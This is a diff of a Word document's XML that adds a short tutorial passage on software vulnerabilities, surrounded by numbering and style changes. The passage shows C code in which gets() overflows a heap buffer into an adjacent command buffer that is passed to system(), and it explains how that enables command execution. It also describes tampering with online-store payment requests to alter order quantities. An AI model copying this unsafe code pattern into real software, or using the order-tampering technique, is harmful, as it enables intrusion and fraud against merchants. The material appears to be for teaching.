+        <w:t>Void main()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Char * name ;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Char *command;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>name = (char *)malloc(10);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>command=(char*)malloc(30);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>printf(“Address of name is :%d”,name);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>printf(“address of command is:%d”,command);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>printf(“Difference between addresses:%d”, command –name);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>printf(“Enter your name :”);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>gets(name);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>printf(“hello! %s\n”,name);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>system(command);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>If executed we will be getting the address of name and command. We will also see the difference between both.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Now if you we any entry that is less than the difference of address if works normally but if you have given and entry larger than the difference the extra will be going into command . so when the system(command) is executed it will consider the extra as a command and executes it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tampering of Data: </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> There is every possibility that we can tamper with the requests over the data. We can use tools like </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">tamperdata or tampermonkey </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to tamper with the requests.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Ex: If you are ordering some product on an online store we can choose how much quantity we need. There is a vulnerability here we can use tamperdata while making a payment. So we can order a single piece but when tampered we can change the quantity of in the order. The end result of this is you will only for one piece but your order contains a delivery for a specified number of yours.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Now this is same as like the above hacks, worked a long time ago but every such sites have patched these vulnerabilities.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
@@ -10932,6 +11235,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="0D0B1BA6"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="69AC6990"/>
+    <w:lvl w:ilvl="0" w:tplc="40090003">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="40090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="40090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="0F2B2316"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="670A5272"/>
@@ -11044,7 +11460,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="19BA3C23"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4EEAC55C"/>
@@ -11130,7 +11546,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1B012005"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3F3685C4"/>
@@ -11216,7 +11632,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1B845814"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6090096A"/>
@@ -11302,7 +11718,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1C540331"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="5CDE07BE"/>
@@ -11415,7 +11831,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="205515BD"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="1D1E71C6"/>
@@ -11504,7 +11920,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="20EB0347"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="AF2483BE"/>
@@ -11617,7 +12033,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="28755231"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="AEC09966"/>
@@ -11730,7 +12146,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2C533112"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="52DE695A"/>
@@ -11843,7 +12259,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2C80678E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EF66D31E"/>
@@ -11956,7 +12372,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2CB97ECF"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="3D763EB8"/>
@@ -12069,7 +12485,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2EC916C9"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="9744997E"/>
@@ -12155,7 +12571,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2F756123"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8F9A7344"/>
@@ -12241,7 +12657,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="35D56A6F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="13D67F38"/>
@@ -12327,7 +12743,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3BBA210B"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="9392F422"/>
@@ -12440,7 +12856,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3C4C7B79"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4F5C0A08"/>
@@ -12553,7 +12969,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="40413435"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="30186B74"/>
@@ -12666,7 +13082,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="42A20738"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="5E1240AE"/>
@@ -12779,7 +13195,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="43EF75BB"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="B54C9A6A"/>
@@ -12892,7 +13308,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="466B2C0A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="81CABED2"/>
@@ -13005,7 +13421,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4CFB7364"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="13FCFC6A"/>
@@ -13118,7 +13534,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5103291A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E564C9B0"/>
@@ -13231,7 +13647,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="56746C9B"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="93687E9C"/>
@@ -13344,7 +13760,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="58D63FD5"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="FB7A028A"/>
@@ -13457,7 +13873,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5AEA7BFF"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7DFE11AE"/>
@@ -13570,7 +13986,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="64E4550A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6C765CC8"/>
@@ -13683,7 +14099,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6DA176D3"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="BE0E9F7C"/>
@@ -13796,7 +14212,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="782F7235"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="65A04688"/>
@@ -13909,7 +14325,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="31" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7D795EE6"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="F3F82F6E"/>
@@ -14023,7 +14439,7 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
-    <w:abstractNumId w:val="22"/>
+    <w:abstractNumId w:val="23"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -14053,6 +14469,36 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="2">
+    <w:abstractNumId w:val="31"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="1">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="2">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="3">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="4">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="5">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="6">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="7">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="8">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="3">
     <w:abstractNumId w:val="30"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
@@ -14082,38 +14528,8 @@
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
-  <w:num w:numId="3">
-    <w:abstractNumId w:val="29"/>
-    <w:lvlOverride w:ilvl="0">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="1">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="2">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="3">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="4">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="5">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="6">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="7">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="8">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-  </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="6"/>
+    <w:abstractNumId w:val="7"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -14143,7 +14559,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="5">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="17"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -14173,7 +14589,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="6">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="13"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -14203,7 +14619,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="7">
-    <w:abstractNumId w:val="24"/>
+    <w:abstractNumId w:val="25"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -14233,7 +14649,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="8">
-    <w:abstractNumId w:val="19"/>
+    <w:abstractNumId w:val="20"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -14263,7 +14679,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="9">
-    <w:abstractNumId w:val="25"/>
+    <w:abstractNumId w:val="26"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -14293,73 +14709,76 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="10">
-    <w:abstractNumId w:val="28"/>
+    <w:abstractNumId w:val="29"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="28"/>
+    <w:abstractNumId w:val="29"/>
   </w:num>
   <w:num w:numId="12">
-    <w:abstractNumId w:val="20"/>
+    <w:abstractNumId w:val="21"/>
   </w:num>
   <w:num w:numId="13">
+    <w:abstractNumId w:val="11"/>
+  </w:num>
+  <w:num w:numId="14">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="15">
+    <w:abstractNumId w:val="14"/>
+  </w:num>
+  <w:num w:numId="16">
     <w:abstractNumId w:val="10"/>
   </w:num>
-  <w:num w:numId="14">
-    <w:abstractNumId w:val="8"/>
-  </w:num>
-  <w:num w:numId="15">
-    <w:abstractNumId w:val="13"/>
-  </w:num>
-  <w:num w:numId="16">
-    <w:abstractNumId w:val="9"/>
-  </w:num>
   <w:num w:numId="17">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="18">
-    <w:abstractNumId w:val="7"/>
+    <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="19">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="20">
+    <w:abstractNumId w:val="28"/>
+  </w:num>
+  <w:num w:numId="21">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="22">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="23">
     <w:abstractNumId w:val="27"/>
   </w:num>
-  <w:num w:numId="21">
-    <w:abstractNumId w:val="5"/>
+  <w:num w:numId="24">
+    <w:abstractNumId w:val="22"/>
   </w:num>
-  <w:num w:numId="22">
+  <w:num w:numId="25">
+    <w:abstractNumId w:val="16"/>
+  </w:num>
+  <w:num w:numId="26">
+    <w:abstractNumId w:val="24"/>
+  </w:num>
+  <w:num w:numId="27">
     <w:abstractNumId w:val="4"/>
   </w:num>
-  <w:num w:numId="23">
-    <w:abstractNumId w:val="26"/>
-  </w:num>
-  <w:num w:numId="24">
-    <w:abstractNumId w:val="21"/>
-  </w:num>
-  <w:num w:numId="25">
-    <w:abstractNumId w:val="15"/>
-  </w:num>
-  <w:num w:numId="26">
-    <w:abstractNumId w:val="23"/>
-  </w:num>
-  <w:num w:numId="27">
+  <w:num w:numId="28">
     <w:abstractNumId w:val="3"/>
   </w:num>
-  <w:num w:numId="28">
-    <w:abstractNumId w:val="2"/>
-  </w:num>
   <w:num w:numId="29">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="30">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="31">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="32">
-    <w:abstractNumId w:val="18"/>
+    <w:abstractNumId w:val="19"/>
+  </w:num>
+  <w:num w:numId="33">
+    <w:abstractNumId w:val="2"/>
   </w:num>
 </w:numbering>
 </file>
@@ -14817,7 +15236,6 @@
     <w:next w:val="Normal"/>
     <w:link w:val="Heading3Char"/>
     <w:uiPriority w:val="9"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
     <w:rsid w:val="007B7E72"/>
@@ -15287,7 +15705,6 @@
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:link w:val="Heading3"/>
     <w:uiPriority w:val="9"/>
-    <w:semiHidden/>
     <w:rsid w:val="007B7E72"/>
     <w:rPr>
       <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
@@ -16339,6 +16756,13 @@
         </dgm:presLayoutVars>
       </dgm:prSet>
       <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
     </dgm:pt>
     <dgm:pt modelId="{DA789D76-2ED8-45A2-981D-3BD7CFC38014}" type="pres">
       <dgm:prSet presAssocID="{32CAB45C-5504-43F4-BD0B-E6BB848F8D66}" presName="firstNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="6" custScaleX="77428" custScaleY="77607">
@@ -16358,6 +16782,13 @@
     <dgm:pt modelId="{220F6836-5000-4BC1-8FE8-9539F8D4CCDC}" type="pres">
       <dgm:prSet presAssocID="{32681F8D-9D8E-4727-8479-EA7057C17516}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="5"/>
       <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
     </dgm:pt>
     <dgm:pt modelId="{9AEC3832-438D-4221-B6E6-1F413B84BB9D}" type="pres">
       <dgm:prSet presAssocID="{DB6C199B-2444-4A39-89D8-D62BE1923D5A}" presName="middleNode" presStyleCnt="0"/>
@@ -16385,6 +16816,13 @@
     <dgm:pt modelId="{66F318BB-222F-4159-A34F-C52A62A28F62}" type="pres">
       <dgm:prSet presAssocID="{9534400A-60B4-4180-B3F1-AFD424AE68CE}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="5"/>
       <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
     </dgm:pt>
     <dgm:pt modelId="{FB7E4BC7-26C6-4F90-BB14-059544BB36D5}" type="pres">
       <dgm:prSet presAssocID="{0F52D196-7939-437B-91DB-B98A69237BEA}" presName="middleNode" presStyleCnt="0"/>
@@ -16401,10 +16839,24 @@
         </dgm:presLayoutVars>
       </dgm:prSet>
       <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
     </dgm:pt>
     <dgm:pt modelId="{A120EEDA-63B5-4BF5-B2C4-813ACBA210CA}" type="pres">
       <dgm:prSet presAssocID="{DB71D523-8951-4851-923D-2052681B332D}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="5"/>
       <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
     </dgm:pt>
     <dgm:pt modelId="{4FDC543E-C148-4881-AD9F-47C07A971BBA}" type="pres">
       <dgm:prSet presAssocID="{73C8B386-D87A-40C5-BFB8-16DDFACC7052}" presName="middleNode" presStyleCnt="0"/>
@@ -16432,6 +16884,13 @@
